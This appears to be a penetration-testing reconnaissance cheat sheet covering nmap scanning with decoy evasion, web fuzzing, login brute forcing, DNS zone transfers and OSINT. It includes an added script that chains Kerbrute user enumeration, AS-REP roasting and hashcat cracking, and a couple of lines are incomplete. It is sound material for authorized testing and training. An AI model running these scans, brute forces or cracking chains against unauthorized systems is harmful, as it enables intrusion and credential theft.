Reconnaissance (recon) can be defined as a preliminary survey or observation of your target (client) without alerting it to your activities. If your reconnaissance is too noisy, the other party will be alerted, which lowers your chances of success.
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” – Sun Tzu
Add the domain to /etc/hosts if needed
Network scan
Host discovery
Host discovery ping sweep (not passive: ARP requests on the local segment, ICMP/TCP probes on remote networks) :
nmap -sn <CIDR>
SMB host :
crackmapexec smb <IP-range>
Windows domain controllers (DNS, Kerberos, LDAP, SMB, LDAPS) :
nmap -T3 -p53,88,389,445,636 <IP-range> --open
# Windows NetBIOS name to IP :
ping <hostname>
nslookup <hostname>
Passive scan (ARP sniff) :
sudo netdiscover -i <interface> -r <IP> -p
Active scan (sends ARP requests) :
sudo netdiscover -i <interface> -r <IP>
👺 Impacts network performance
Fast scan (top 1K TCP and UDP ports; -oA takes a basename and writes quick.nmap, quick.gnmap and quick.xml) :
sudo nmap -sS -sU -sV -sC -oA quick <IP>
Full scan (run again with all ports; -p- combined with -sU also scans all 65535 UDP ports and takes hours, so drop -sU here or limit UDP to --top-ports) :
sudo nmap -p- -sS -sU -sV -sC -oA full <IP>
Aggressive fast scan :
nmap -A <IP>
Aggressive host scan (all ports including 0, every -A feature enabled, if needed) :
nmap -p0- -v -A -T4 -oA aggressive <IP>
Vulnerability scan (default and vuln NSE categories, -sV is required for most vuln scripts) :
nmap -sV --script=default,vuln -oA vuln <IP>
Decoy scan from spoofed IPs (firewall/IDS evasion; your real address still sends probes, ME sets its position in the list, and the decoys should be live hosts) :
nmap -D <IP-1>,...,ME,<IP-n> <IP>
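A two-stage scan workflow, added here as an example and not part of the original page: ping sweep, parse the live hosts out of the grepable output, full TCP port scan per host, then run -sV -sC only on the ports that were found. This is the "run again with all ports" idea above, automated. The gnmap samples embedded in the script are constructed so the two parsers can be exercised offline; nmap must be installed and the script run as root for -sS. The target CIDR and output directory are the script's own arguments (an assumption of this example).

```shell
#!/bin/sh
# Two-stage nmap workflow (added example, not from the original page).
# Usage: sudo ./staged-scan.sh <CIDR> [outdir]
set -eu

# Constructed sample of `nmap -sn -oG` output, used to exercise the parsers offline.
SAMPLE_SWEEP=$(printf 'Host: 10.10.10.5 ()\tStatus: Up\nHost: 10.10.10.6 ()\tStatus: Down\nHost: 10.10.10.7 (dc01.lab.local)\tStatus: Up\n')

# Constructed sample of `nmap -sS -p- -oG` output for one host.
SAMPLE_PORTS=$(printf 'Host: 10.10.10.5 ()\tStatus: Up\nHost: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 53/open|filtered/udp//domain///, 80/open/tcp//http//nginx 1.18.0/, 443/open/tcp//https//nginx 1.18.0/, 8080/closed/tcp//http-proxy///\tIgnored State: filtered (65530)\n')

# stdin: .gnmap content  ->  stdout: one live IP per line
gnmap_live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# stdin: .gnmap content  ->  stdout: open TCP ports as "22,80,443" (empty if none).
# gnmap fields are tab-separated; each port entry is port/state/proto/owner/service/rpc/version/.
gnmap_open_ports() {
    awk -F'\t' '/^Host:/ { for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) print substr($i, 8) }' \
      | tr ',' '\n' | sed 's/^ *//' \
      | awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }' \
      | sort -n | uniq | paste -s -d, -
}

# Sweep, then per live host: fast all-ports SYN scan, then service/script scan on open ports only.
staged_scan() {
    cidr=$1; out=${2:-scans}
    mkdir -p "$out"
    nmap -sn -oG "$out/sweep.gnmap" "$cidr" > /dev/null
    gnmap_live_hosts < "$out/sweep.gnmap" | while read -r ip; do
        nmap -sS -p- --min-rate 1000 -oG "$out/$ip.ports.gnmap" "$ip" > /dev/null
        ports=$(gnmap_open_ports < "$out/$ip.ports.gnmap")
        [ -n "$ports" ] || continue
        nmap -sS -sV -sC -p "$ports" -oA "$out/$ip.detail" "$ip"
    done
}

if [ $# -gt 0 ]; then staged_scan "$@"; fi
```

The parsers deliberately keep only `open` TCP entries: `open|filtered` UDP results and `closed` ports would otherwise inflate the -sV -sC stage, which is the slow part.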
| Option | Description |
| --- | --- |
| -sC | Scan with the default NSE scripts (same as --script=default); considered useful for discovery and safe |
| -sS | TCP SYN port scan (default with root privileges) |
| -sT | TCP connect port scan (default without root privileges) |
| -sU | UDP port scan |
| -sA | TCP ACK port scan (maps firewall rules, does not find open ports) |
| -sW | TCP Window port scan |
| -sV | Attempts to determine the version of the service running on each open port |
| -A | Aggressive mode: enables OS detection, version detection, script scanning and traceroute |
| -O | OS fingerprinting |
| -T0 | Paranoid (0): IDS evasion, one probe at a time with long waits |
| -T1 | Sneaky (1): IDS evasion |
| -T2 | Polite (2): slows down the scan to use less bandwidth and fewer target machine resources |
| -T3 | Normal (3): the default speed |
| -T4 | Aggressive (4): speeds up the scan; assumes you are on a reasonably fast and reliable network |
| -T5 | Insane (5): speeds up the scan; assumes an extraordinarily fast network and may miss ports |
| -oA <basename> | Output in the three major formats at once (.nmap, .gnmap, .xml) |
| -D <decoys> | Decoy scan: mixes probes from spoofed IPs with your own |
| --script=safe | Scripts that won't affect the target |
| --script=vuln | Scan for known vulnerabilities |
| --script=exploit | Attempt to exploit a vulnerability |
| --script=auth | Attempt to bypass authentication on running services (e.g. log into an FTP server anonymously) |
| --script=brute | Attempt to brute-force credentials for running services |
| --script=discovery | Query running services for further information about the network (e.g. query an SNMP server) |
| -oG <file> | Grepable output format |
Scan automation (nmapAutomator scan types) :
nmapAutomator.sh -H <IP> -t Recon
- Network : Shows all live hosts in the host’s network (~15 seconds)
- Port : Shows all open ports (~15 seconds)
- Script : Runs a script scan on found ports (~5 minutes)
- Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
- UDP : Runs a UDP scan “requires sudo” (~5 minutes)
- Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
- Recon : Suggests recon commands, then prompts to automatically run them
- All : Runs all the scans (~20-30 minutes)
IPv4 host discovery from a Windows host (IPv4NetworkScan.ps1) :
powershell -ep bypass
L:\oscp\IPv4NetworkScan.ps1 -StartIPv4Address <IP-start> -EndIPv4Address <IP-end>
Host discovery (ARP, local segment only, needs root) :
sudo arp-scan <IP>/24
Directory brute-forcing (FUZZ marks the injection point)
ffuf -u <url>/FUZZ -w <wordlist> -recursion
ffuf -u <url>/FUZZ -w <wordlist>
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
# /usr/share/wordlists/dirb/common.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# look for responses 200 & 302 (and 301/403); filter noise with -fc / -fs / -fw
# append extensions to the keyword: FUZZ.pdf, FUZZ.txt, FUZZ.php, FUZZ.aspx (or -e .pdf,.txt,.php,.aspx)
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Linux (from github)
Login brute force (POST form; filter the failed-login response with -fc, -fs or -fr) :
ffuf -u <url>/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w <wordlist>
Domains / Subdomains
Search engines
# Google search (site:<domain>)
Virtual host fuzzing (filter out the default response size with -fs) :
ffuf -u http://<IP> -H "Host: FUZZ.<domain>" -w <wordlist>
# look for responses 200 & 302
DNS records enumeration
for type in A AAAA MX NS TXT CNAME SOA PTR SRV CAA HINFO NAPTR CERT DNAME DNSKEY DS LOC RP SSHFP TLSA; do echo "=== $type records ==="; host -t $type <domain>; echo ""; done
whois <domain> # registrar / hosting
host -a <domain>
host -l <domain> [dns-server] # zone transfer (AXFR), usually refused
dnsrecon -d <domain> -t axfr [dns-server] # (active)
dnsenum <domain>
dig @<dns-server> <domain>
nslookup <domain>
sublist3r -d <domain> # aggregates multiple passive sources
Reverse IP Lookup
nslookup <IP>
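Zone transfer against every name server of the domain, with the answer section converted into /etc/hosts lines (the "add the domain to /etc/hosts" step at the top of the page). This is an added example, not part of the original page. It assumes host and dig are installed and that the domain is passed as the script's argument; the dig output embedded below is constructed so the converter can be exercised offline.

```shell
#!/bin/sh
# AXFR to /etc/hosts helper (added example, not from the original page).
# Usage: ./axfr-hosts.sh <domain>
set -eu

# Constructed sample of `dig +noall +answer axfr lab.local @dc01` output.
SAMPLE_AXFR='lab.local.        3600 IN SOA   dc01.lab.local. hostmaster.lab.local. 7 900 600 86400 3600
lab.local.        3600 IN NS    dc01.lab.local.
dc01.lab.local.   3600 IN A     10.10.10.7
www.lab.local.    3600 IN A     10.10.10.5
dev.lab.local.    3600 IN A     10.10.10.5
dev.lab.local.    3600 IN A     10.10.10.5
mail.lab.local.   3600 IN A     10.10.10.9
mail.lab.local.   3600 IN AAAA  fd00::9
lab.local.        3600 IN SOA   dc01.lab.local. hostmaster.lab.local. 7 900 600 86400 3600'

# Try a zone transfer against every authoritative name server of $1.
# Most servers refuse AXFR; a refusal is just logged and the next server is tried.
axfr_all() {
    host -t ns "$1" | awk '{ print $NF }' | sed 's/\.$//' | while read -r ns; do
        echo "=== AXFR $1 @ $ns ===" >&2
        dig +noall +answer axfr "$1" "@$ns" || true
    done
}

# stdin: dig answer lines -> stdout: "IP name1 name2 ..." per IP, sorted by IP, deduplicated.
# Only A records are used; the trailing dot of each owner name is stripped.
dig_to_hosts() {
    awk '$4 == "A" { sub(/\.$/, "", $1); print $5, $1 }' \
      | sort -u \
      | awk '$1 != ip { if (ip != "") print line; ip = $1; line = $1 } { line = line " " $2 }
             END { if (ip != "") print line }'
}

# Append generated lines to /etc/hosts, skipping any that are already there.
hosts_add() {
    while read -r line; do
        grep -qxF "$line" /etc/hosts || printf '%s\n' "$line" | sudo tee -a /etc/hosts > /dev/null
    done
}

if [ $# -gt 0 ]; then axfr_all "$1" | dig_to_hosts | hosts_add; fi
```

Grouping by IP matters for web targets: several names on one address usually means name-based virtual hosts, so each of them is worth visiting separately with the right Host header.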
Active Directory
Enumerate AD Users
Username brute force with Kerbrute (no credentials needed; valid and invalid names get different KDC errors)
Valid usernames :
./kerbrute userenum --dc <DC-IP> -d <domain> <usernames.txt>
AS-REP Roasting (users with "Do not require Kerberos preauthentication" set)
Get a KRB_AS_REP (with domain credentials, enumerates the roastable users via LDAP and requests their AS-REP; without credentials use -usersfile <usernames.txt> -no-pass instead) :
impacket-GetNPUsers -dc-ip <DC-IP> -request -format hashcat -outputfile hashes.asreproast <domain>/<username>
Crack the password (mode 18200 = Kerberos 5 AS-REP etype 23) :
hashcat -m 18200 hashes.asreproast <wordlist> -r /usr/share/hashcat/rules/best64.rule
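The Kerbrute, GetNPUsers and hashcat steps above chained into one script, added here as an example and not part of the original page. It assumes kerbrute, impacket-GetNPUsers and hashcat are on PATH and that the DC IP, domain and candidate username list are passed as arguments; the kerbrute output sample embedded below is constructed so the parsing step can run offline. This is the unauthenticated path: it uses -usersfile with -no-pass rather than a domain account.

```shell
#!/bin/sh
# Kerbrute -> GetNPUsers -> hashcat chain (added example, not from the original page).
# Usage: ./asrep-chain.sh <DC-IP> <domain> <candidate-usernames.txt> [wordlist]
set -eu

# Constructed sample of `kerbrute userenum` output.
SAMPLE_KERBRUTE='2024/01/15 09:12:03 >  Using KDC(s):
2024/01/15 09:12:03 >   10.10.10.7:88

2024/01/15 09:12:04 >  [+] VALID USERNAME:   administrator@lab.local
2024/01/15 09:12:04 >  [+] VALID USERNAME:   jdoe@lab.local
2024/01/15 09:12:05 >  [+] VALID USERNAME:   svc_backup@lab.local
2024/01/15 09:12:06 >  Done! Tested 4 usernames (3 valid) in 2.1 seconds'

# stdin: kerbrute output -> stdout: valid usernames without the @domain suffix, deduplicated
kerbrute_valid_users() {
    grep 'VALID USERNAME' | awk '{ print $NF }' | cut -d@ -f1 | sort -u
}

asrep_chain() {
    dc=$1; domain=$2; candidates=$3; wordlist=${4:-/usr/share/wordlists/rockyou.txt}

    # 1. Enumerate valid accounts (no authentication, one AS-REQ per candidate).
    kerbrute userenum --dc "$dc" -d "$domain" "$candidates" | tee kerbrute.log | kerbrute_valid_users > valid_users.txt
    echo "[*] $(wc -l < valid_users.txt) valid users written to valid_users.txt" >&2

    # 2. Ask the KDC for an AS-REP for each valid user without a password; only accounts
    #    with pre-authentication disabled answer with an encrypted (crackable) blob.
    impacket-GetNPUsers "$domain/" -usersfile valid_users.txt -no-pass -dc-ip "$dc" -format hashcat -outputfile hashes.asreproast
    [ -s hashes.asreproast ] || { echo "[-] no AS-REP roastable users" >&2; return 0; }

    # 3. Crack offline (18200 = Kerberos 5 AS-REP etype 23) and show recovered passwords.
    hashcat -m 18200 hashes.asreproast "$wordlist" -r /usr/share/hashcat/rules/best64.rule
    hashcat -m 18200 hashes.asreproast --show
}

if [ $# -ge 3 ]; then asrep_chain "$@"; fi
```

Every step here is unauthenticated and shows up in the DC's Kerberos logs (event 4768 for each AS-REQ), so this is the noisy end of the recon spectrum: keep the candidate list short rather than spraying a full wordlist.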
Web application vulnerabilities
nikto -h <url>
wpscan --url <url> # WordPress only (Joomla, Drupal and Moodle need their own CMS scanners)
whatweb <url> # list the web technologies in use
## Injection
// SQL
sqlmap -u "<url>?id=1" -p id # GET requests
sqlmap -u "<url>/login" --data "username=*&password=*" # POST requests (* marks the injection points)
python3 -t http://dev.stocker.htb/login -u username -p password #
nmap -p <port> <IP> --script=<script-name>
searchsploit <technologie>
Frameworks enumeration
sudo sniper -t <domain> # sn1per, default (noisy) mode
sudo sniper -t <domain> -m stealth -o -re # stealth mode with OSINT and recon enabled
# passive + OSINT sources (amass v3 flags)
sudo amass enum -d <domain> -src -ip
Social / OSINT
- Google Search / Google Image
- Profile pages (LinkedIn, Twitter, Facebook, Instagram)
- Job postings
- Git repositories
- Forums
# filter by website
site:<domain> <keyword>
# cache search (old version of a page; Google retired the cache: operator in 2024, use the Wayback Machine instead)
cache:<url> <keyword>
cache:<url> hello
# search within the html body (full word)
allintext:<keyword> <keyword>
allintext:username password
# file type filter
filetype:pdf <keyword>
# programming language filter
ext:php or ext:xml or ext:python
# exclusion
<keyword> -<word>
See also: Exploit-DB (Google Hacking Database), DorkSearch
Reconnaissance tool built on a graph of entities and transforms: domain name -> IP -> reverse DNS -> other domain names
shodan myip # your public IP
shodan host <IP> # open ports, banners and CVEs Shodan has indexed for the host
recon-ng (interactive shell) :
> help
> workspaces create <WORKSPACE_NAME>
> db schema # database layout
> db insert domains # add the domain to analyse
> marketplace search <module>
> marketplace info <module>
> marketplace install <module>
> marketplace remove <module>
> modules search <module>
> modules load <module>
> options list
> options set SOURCE <domain>
> run
recon-ng -w <WORKSPACE_NAME> # start with a predefined workspace